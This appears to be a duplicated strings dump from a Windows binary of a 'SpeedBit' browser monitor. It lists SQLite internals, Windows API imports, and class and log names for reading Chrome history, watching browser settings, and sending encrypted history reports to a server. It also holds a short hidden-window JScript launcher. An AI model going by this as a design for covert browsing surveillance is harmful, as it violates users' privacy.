view %s may not be altered
sqlite_sequence
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat1
sqlite_stat1
sqlite_altertab_%s
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE tbl=%Q
DELETE FROM %Q.%s WHERE tbl=%Q
invalid name: "%s"
invalid name: "%s"
SELECT idx, stat FROM %Q.sqlite_stat1
SELECT idx, stat FROM %Q.sqlite_stat1
too many attached databases - max %d
too many attached databases - max %d
database %s is already in use
database %s is already in use
unable to open database: %s
unable to open database: %s
cannot detach database %s
cannot detach database %s
no such database: %s
no such database: %s
database %s is locked
database %s is locked
sqlite_attach
sqlite_attach
sqlite_detach
sqlite_detach
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
too many columns on %s
too many columns on %s
there is already an index named %s
there is already an index named %s
default value of column [%s] is not constant
default value of column [%s] is not constant
duplicate column name: %s
duplicate column name: %s
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
table "%s" has more than one primary key
no such collation sequence: %s
no such collation sequence: %s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE %s %.*s
CREATE %s %.*s
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
view %s is circularly defined
table %s may not be dropped
table %s may not be dropped
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %s.sqlite_sequence WHERE name=%Q
DELETE FROM %s.sqlite_sequence WHERE name=%Q
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
indexed columns are not unique
indexed columns are not unique
table %s may not be indexed
table %s may not be indexed
virtual tables may not be indexed
virtual tables may not be indexed
views may not be indexed
views may not be indexed
index %s already exists
index %s already exists
there is already a table named %s
there is already a table named %s
table %s has no column named %s
table %s has no column named %s
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
no such index: %S
no such index: %S
DELETE FROM %Q.%s WHERE name=%Q
DELETE FROM %Q.%s WHERE name=%Q
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
a JOIN clause is required before %s
a JOIN clause is required before %s
unable to identify the object to be reindexed
unable to identify the object to be reindexed
cannot modify %s because it is a view
cannot modify %s because it is a view
table %s may not be modified
table %s may not be modified
sqlite_source_id
sqlite_source_id
sqlite_version
sqlite_version
sqlite_compileoption_get
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_compileoption_used
foreign key mismatch
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
table %S has no column named %s
table %S has no column named %s
%d values for %d columns
%d values for %d columns
%s.%s may not be NULL
%s.%s may not be NULL
PRIMARY KEY must be unique
PRIMARY KEY must be unique
sqlite3_extension_init
sqlite3_extension_init
no entry point [%s] in shared library [%s]
no entry point [%s] in shared library [%s]
unable to open shared library [%s]
unable to open shared library [%s]
automatic extension loading failed: %s
automatic extension loading failed: %s
error during initialization: %s
error during initialization: %s
foreign_keys
foreign_keys
foreign_key_list
foreign_key_list
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
malformed database schema (%s)
malformed database schema (%s)
%s - %s
%s - %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
unsupported file format
unsupported file format
database schema is locked: %s
database schema is locked: %s
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
%s.%s
%s.%s
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
%s:%d
%s:%d
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
sqlite_subquery_%p_
sqlite_subquery_%p_
no such index: %s
no such index: %s
no such table: %s
no such table: %s
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
no such trigger: %S
no such trigger: %S
no such column: %s
no such column: %s
-- TRIGGER %s
-- TRIGGER %s
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
vtable constructor failed: %s
vtable constructor failed: %s
no such module: %s
no such module: %s
at most %d tables in a join
at most %d tables in a join
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
TABLE %s
TABLE %s
cannot use index: %s
cannot use index: %s
%s WITH AUTOMATIC INDEX
%s WITH AUTOMATIC INDEX
%s AS %s
%s AS %s
%s VIA MULTI-INDEX UNION
%s VIA MULTI-INDEX UNION
%s WITH INDEX %s
%s WITH INDEX %s
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s USING PRIMARY KEY
%s USING PRIMARY KEY
%s ORDER BY
%s ORDER BY
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpSendRequest
WinHttpConnect
WinHttpConnect
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpen
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpReadData
WinHttpReadData
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
WINHTTP.dll
GetExtendedTcpTable
GetExtendedTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
WS2_32.dll
WS2_32.dll
PSAPI.DLL
PSAPI.DLL
WTSAPI32.dll
WTSAPI32.dll
Secur32.dll
Secur32.dll
CryptMsgClose
CryptMsgClose
CertGetNameStringW
CertGetNameStringW
CertFreeCertificateContext
CertFreeCertificateContext
CertFindCertificateInStore
CertFindCertificateInStore
CertCloseStore
CertCloseStore
CryptMsgGetParam
CryptMsgGetParam
CRYPT32.dll
CRYPT32.dll
USERENV.dll
USERENV.dll
HttpSendRequestExW
HttpSendRequestExW
HttpSendRequestW
HttpSendRequestW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestW
HttpEndRequestW
WININET.dll
WININET.dll
CreatePipe
CreatePipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeW
CreateNamedPipeW
DisconnectNamedPipe
DisconnectNamedPipe
GetNamedPipeInfo
GetNamedPipeInfo
GetCPInfo
GetCPInfo
RegCreateKeyW
RegCreateKeyW
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyW
RegOpenKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegDeleteKeyA
RegDeleteKeyA
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyA
RegCreateKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegOpenKeyA
RegOpenKeyA
RegEnumKeyExW
RegEnumKeyExW
RegEnumKeyW
RegEnumKeyW
zcÃ
zcÃ
.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@
.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@
.?AVReportBuilder@Monitor@SpeedBit@@
.?AVReportBuilder@Monitor@SpeedBit@@
.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
.?AVImplementation@ServerReporter@Monitor@SpeedBit@@
.?AVImplementation@ServerReporter@Monitor@SpeedBit@@
.?AVServerReporter@Monitor@SpeedBit@@
.?AVServerReporter@Monitor@SpeedBit@@
.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
.?AVCHttpAsync@@
.?AVCHttpAsync@@
.?AVPipedProcess@Utils@SpeedBit@@
.?AVPipedProcess@Utils@SpeedBit@@
.?AVImplementation@PipedProcess@Utils@SpeedBit@@
.?AVImplementation@PipedProcess@Utils@SpeedBit@@
.?AVImplementation@MachineKey@Utils@SpeedBit@@
.?AVImplementation@MachineKey@Utils@SpeedBit@@
.?AVMachineKey@Utils@SpeedBit@@
.?AVMachineKey@Utils@SpeedBit@@
.?AVCHttp@@
.?AVCHttp@@
.?AVChromeBrowserHistory@SQLite@SpeedBit@@
.?AVChromeBrowserHistory@SQLite@SpeedBit@@
.?AVException@sql@@
.?AVException@sql@@
.?AVLoader@Extension@Chrome@SpeedBit@@
.?AVLoader@Extension@Chrome@SpeedBit@@
.?AVImplementation@Extension@Chrome@SpeedBit@@
.?AVImplementation@Extension@Chrome@SpeedBit@@
.?AVBrowserInfo@Chrome@SpeedBit@@
.?AVBrowserInfo@Chrome@SpeedBit@@
.?AVFactory@BrowserInfo@Chrome@SpeedBit@@
.?AVFactory@BrowserInfo@Chrome@SpeedBit@@
.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@
.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@
.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@
.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@
.?AVExtension@Chrome@SpeedBit@@
.?AVExtension@Chrome@SpeedBit@@
.?AVWebDataDB@SQLite@SpeedBit@@
.?AVWebDataDB@SQLite@SpeedBit@@
.?AVImplementation@WebDataDB@SQLite@SpeedBit@@
.?AVImplementation@WebDataDB@SQLite@SpeedBit@@
.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@
.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@
.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@
.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@
.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@
.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@
.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@
.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@
.?AVSettings@Chrome@General@Config@SpeedBit@@
.?AVSettings@Chrome@General@Config@SpeedBit@@
.?AVUrlSet@Implementation@General@Config@SpeedBit@@
.?AVUrlSet@Implementation@General@Config@SpeedBit@@
.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@
.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@
.?AVOperaSettings@Implementation@General@Config@SpeedBit@@
.?AVOperaSettings@Implementation@General@Config@SpeedBit@@
.?AVSettings@Firefox@General@Config@SpeedBit@@
.?AVSettings@Firefox@General@Config@SpeedBit@@
.?AVSettings@Opera@General@Config@SpeedBit@@
.?AVSettings@Opera@General@Config@SpeedBit@@
.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@
.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@
.?AVChromeSettings@Implementation@General@Config@SpeedBit@@
.?AVChromeSettings@Implementation@General@Config@SpeedBit@@
.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@
.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@
.?AVValueSet@Chrome@General@Config@SpeedBit@@
.?AVValueSet@Chrome@General@Config@SpeedBit@@
.?AVUrlSet@General@Config@SpeedBit@@
.?AVUrlSet@General@Config@SpeedBit@@
.?AVValueSet@Firefox@General@Config@SpeedBit@@
.?AVValueSet@Firefox@General@Config@SpeedBit@@
.?AVChromeSettings@Implementation@User@Config@SpeedBit@@
.?AVChromeSettings@Implementation@User@Config@SpeedBit@@
.?AVSettings@Firefox@User@Config@SpeedBit@@
.?AVSettings@Firefox@User@Config@SpeedBit@@
.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@
.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@
.?AVSettings@Chrome@User@Config@SpeedBit@@
.?AVSettings@Chrome@User@Config@SpeedBit@@
.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@
.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@
.?AVInstallInfo@Firefox@SpeedBit@@
.?AVInstallInfo@Firefox@SpeedBit@@
.?AVProfile@InstallInfo@Firefox@SpeedBit@@
.?AVProfile@InstallInfo@Firefox@SpeedBit@@
.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@
.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@
.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@
.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@
.?AVBrowserSettings@Firefox@SpeedBit@@
.?AVBrowserSettings@Firefox@SpeedBit@@
.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@
.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@
.?AVBrowserSettings@Chrome@SpeedBit@@
.?AVBrowserSettings@Chrome@SpeedBit@@
if (WScript.Arguments.length > 0)
if (WScript.Arguments.length > 0)
var root = WScript.Arguments(0);
var root = WScript.Arguments(0);
for (var i = 1, n = WScript.Arguments.length; i
for (var i = 1, n = WScript.Arguments.length; i
args.push(WScript.Arguments(i));
args.push(WScript.Arguments(i));
var path = "\"" root.replace(/\\*$/, "").replace(/\//g, "\\") "\"";
var path = "\"" root.replace(/\\*$/, "").replace(/\//g, "\\") "\"";
path = " \"" args.join("\" \"") "\"";
path = " \"" args.join("\" \"") "\"";
var shell = WScript.CreateObject("WScript.Shell");
var shell = WScript.CreateObject("WScript.Shell");
shell.Run(path, 0, false);
shell.Run(path, 0, false);
1(1-1F1S1X1n1}1
1(1-1F1S1X1n1}1
00151@1\1
00151@1\1
040;0_0~0
040;0_0~0
?%?)?.?3?>?
?%?)?.?3?>?
8Â8
8Â8
=2=9=`=->:>
=2=9=`=->:>
0"161\1}1
0"161\1}1
1!1)141=1
1!1)141=1
8"9(9,90949
8"9(9,90949
>.?4?8?@?
>.?4?8?@?
2 2$2(2,272
2 2$2(2,272
:%:,:2:8:
:%:,:2:8:
4 4$4(4,4044484
4 4$4(4,4044484
$5(5,5054585
$5(5,5054585
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
> >$>(>,>0>4>8>
> >$>(>,>0>4>8>
? ?,?0?4?8?
? ?,?0?4?8?
,0004080
,0004080
6 6$6(6,6
6 6$6(6,6
7 7(707
7 7(707
combase.dll
combase.dll
kernel32.dll
kernel32.dll
mscoree.dll
mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
portuguese-brazilian
portuguese-brazilian
USER32.DLL
USER32.DLL
Injection::Snapshot::Controller::IsChromeInstalled
Injection::Snapshot::Controller::IsChromeInstalled
Chrome installed:
Chrome installed:
Injection::Snapshot::Controller::IsFirefoxInstalled
Injection::Snapshot::Controller::IsFirefoxInstalled
Firefox installed:
Firefox installed:
Chrome unchanged:
Chrome unchanged:
Firefox unchanged:
Firefox unchanged:
Checking
Checking
Checking
Checking
777705555443332
777705555443332
5555443332
5555443332
5555443332
5555443332
logs\${ModuleName}.${Pid}.log
logs\${ModuleName}.${Pid}.log
WatchmanKey::TimeBomb::UninstallTimeBomb
WatchmanKey::TimeBomb::UninstallTimeBomb
Reporting
Reporting
ChromeExtensionMonitorWorkerThread started
ChromeExtensionMonitorWorkerThread started
ChromeExtensionMonitor::CollectExtensionInfo
ChromeExtensionMonitor::CollectExtensionInfo
ChromeExtensionMonitor::CheckExtension
ChromeExtensionMonitor::CheckExtension
8Reset DNS to 8.8.8.8 for adapter
8Reset DNS to 8.8.8.8 for adapter
WinHTTP Example/1.0
WinHTTP Example/1.0
VVV.google.com
VVV.google.com
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Registry::Helper::RegOpenKeyExA
Registry::Helper::RegOpenKeyExA
Chrome::StartPageProtectionEnabled
Chrome::StartPageProtectionEnabled
Chrome::SearchEngineProtectionEnabled
Chrome::SearchEngineProtectionEnabled
Chrome::RestoreOnStartupProtectionEnabled
Chrome::RestoreOnStartupProtectionEnabled
Chrome::StartPageProtectionDisabled
Chrome::StartPageProtectionDisabled
Chrome::SearchEngineProtectionDisabled
Chrome::SearchEngineProtectionDisabled
Chrome::RestoreOnStartupProtectionDisabled
Chrome::RestoreOnStartupProtectionDisabled
Firefox::StartPageChangedByUser
Firefox::StartPageChangedByUser
Firefox::SearchEngineChangedByUser
Firefox::SearchEngineChangedByUser
Explorer.HomePageEvent:
Explorer.HomePageEvent:
Explorer.SearchEngineEvent:
Explorer.SearchEngineEvent:
Firefox.HomePageEvent:
Firefox.HomePageEvent:
Firefox.SearchEngineEvent:
Firefox.SearchEngineEvent:
ProcessCatcher::ExecutionContext::Resume
ProcessCatcher::ExecutionContext::Resume
Allocation
Allocation
iexplore.exe
iexplore.exe
rundll32.exe
rundll32.exe
chrome.exe
chrome.exe
firefox.exe
firefox.exe
opera.exe
opera.exe
safari.exe
safari.exe
navigator.exe
navigator.exe
torch.exe
torch.exe
U.exe
U.exe
epic.exe
epic.exe
browser.exe
browser.exe
Maxthon.exe
Maxthon.exe
sbframe.exe
sbframe.exe
avant.exe
avant.exe
dragon.exe
dragon.exe
bobrowser.exe
bobrowser.exe
crossbrowse.exe
crossbrowse.exe
vosteran.exe
vosteran.exe
ProcessMonitor::ExecutionContext::Resume
ProcessMonitor::ExecutionContext::Resume
E:\iexplore.exe|E:\rundll32.exe
E:\iexplore.exe|E:\rundll32.exe
E:\chrome.exe
E:\chrome.exe
E:\firefox.exe
E:\firefox.exe
E:\opera.exe
E:\opera.exe
E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe
E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe
smci32.dll
smci32.dll
smi32.exe
smi32.exe
Utils::PipedProcess::Create
Utils::PipedProcess::Create
Utils::PipedProcess::Start
Utils::PipedProcess::Start
Utils::PipedProcess::WriteData
Utils::PipedProcess::WriteData
[ReportDllsThread]
[ReportDllsThread]
ProcessWatcher::ExecutionContext::Resume
ProcessWatcher::ExecutionContext::Resume
Local proxy port:
Local proxy port:
127.0.0.1
127.0.0.1
[ProxyMonitor::getProcessByPort]
[ProxyMonitor::getProcessByPort]
Failed to get GetExtendedTcpTable
Failed to get GetExtendedTcpTable
smei32.dll
smei32.dll
[ReportBuilder::MakeDefaultBrowserSettingsElement]
[ReportBuilder::MakeDefaultBrowserSettingsElement]
[ReportBuilder::CalculateHash]
[ReportBuilder::CalculateHash]
Result.Hash:
Result.Hash:
[ReportBuilder::MakeHistoryReport]
[ReportBuilder::MakeHistoryReport]
Building history report...
Building history report...
ReportBuilder::GetWMISystemInfo
ReportBuilder::GetWMISystemInfo
ReportBuilder::GetExplorerBrowserInfo
ReportBuilder::GetExplorerBrowserInfo
ReportBuilder::GetChromeBrowserInfo
ReportBuilder::GetChromeBrowserInfo
. Chrome Search:
. Chrome Search:
History Report:
History Report:
[ReportBuilder::MakeReport]
[ReportBuilder::MakeReport]
Report:
Report:
[ReportBuilder::GetExplorerBrowserInfo]
[ReportBuilder::GetExplorerBrowserInfo]
[ReportBuilder::GetChromeBrowserInfo]
[ReportBuilder::GetChromeBrowserInfo]
Chrome::BrowserInfo::Factory::Create
Chrome::BrowserInfo::Factory::Create
Chrome::BrowserInfo::Factory::GetInfo
Chrome::BrowserInfo::Factory::GetInfo
sma.exe
sma.exe
Utils::PipedProcess::ReadData
Utils::PipedProcess::ReadData
Utils::PipedProcess::Wait
Utils::PipedProcess::Wait
Utils::PipedProcess::WriteEof
Utils::PipedProcess::WriteEof
Utils::MachineKey::Create
Utils::MachineKey::Create
Utils::MachineKey::Generate
Utils::MachineKey::Generate
Encrypt data. Key:
Encrypt data. Key:
Decrypt data. Key:
Decrypt data. Key:
ReportBuilder::MakeInstallReport
ReportBuilder::MakeInstallReport
[ServerReporter::SendInstallReport]
[ServerReporter::SendInstallReport]
ReportBuilder::MakeUninstallReport
ReportBuilder::MakeUninstallReport
[ServerReporter::SendUninstallReport]
[ServerReporter::SendUninstallReport]
ReportBuilder::MakeRegulatReport
ReportBuilder::MakeRegulatReport
[ServerReporter::SendRegularReport]
[ServerReporter::SendRegularReport]
ReportBuilder::MakeUserActionReport
ReportBuilder::MakeUserActionReport
[ServerReporter::SendUserActionReport]
[ServerReporter::SendUserActionReport]
ReportBuilder::MakeHistoryReport
ReportBuilder::MakeHistoryReport
[ServerReporter::SendHistoryReport]
[ServerReporter::SendHistoryReport]
ServerReporter::MakeReport
ServerReporter::MakeReport
ServerReporter::SendReport
ServerReporter::SendReport
[ServerReporter::SendReport]
[ServerReporter::SendReport]
ServerEncryption::CreateSessionKey
ServerEncryption::CreateSessionKey
Report in Base 64:
Report in Base 64:
10D2FBE6-2346-4627-A9F5-FB48313C5001
10D2FBE6-2346-4627-A9F5-FB48313C5001
ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)
ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)
ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one
ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one
[ServerReporter::GetUserProfile]
[ServerReporter::GetUserProfile]
[ServerReporter::MakeReport]
[ServerReporter::MakeReport]
ServerReporter::GetUserProfile
ServerReporter::GetUserProfile
ReportBuilder::Create
ReportBuilder::Create
Result.Report:
Result.Report:
[ServerReporter::SetLastReportTime]
[ServerReporter::SetLastReportTime]
WatchmanKey::Reporter::SetLastTime
WatchmanKey::Reporter::SetLastTime
Package url:
Package url:
WatchmanKey::Updater::SetLastTime
WatchmanKey::Updater::SetLastTime
.Service
.Service
\Microsoft\Windows\Start Menu
\Microsoft\Windows\Start Menu
*.lnk
*.lnk
\Internet Explorer\iexplore.exe
\Internet Explorer\iexplore.exe
\Safari\Safari.exe
\Safari\Safari.exe
/report
/report
/report1
/report1
%d.%d.%d.%d%n
%d.%d.%d.%d%n
Created URL Set object from configuration. Name:
Created URL Set object from configuration. Name:
UrlSetID:
UrlSetID:
Could not find matching URL set... Using old configuration
Could not find matching URL set... Using old configuration
[LocalScope::UpdateParser::ParseReportSection]
[LocalScope::UpdateParser::ParseReportSection]
Monitor::ServerEncryption::CreateSessionKey
Monitor::ServerEncryption::CreateSessionKey
Full url:
Full url:
Data url:
Data url:
sbu.exe
sbu.exe
smw.sys
smw.sys
wscript.exe
wscript.exe
smhe.js
smhe.js
[Monitor::WatchmanGuard::SendReport]
[Monitor::WatchmanGuard::SendReport]
InstallReporter
InstallReporter
Monitor::ServerReporter::Create
Monitor::ServerReporter::Create
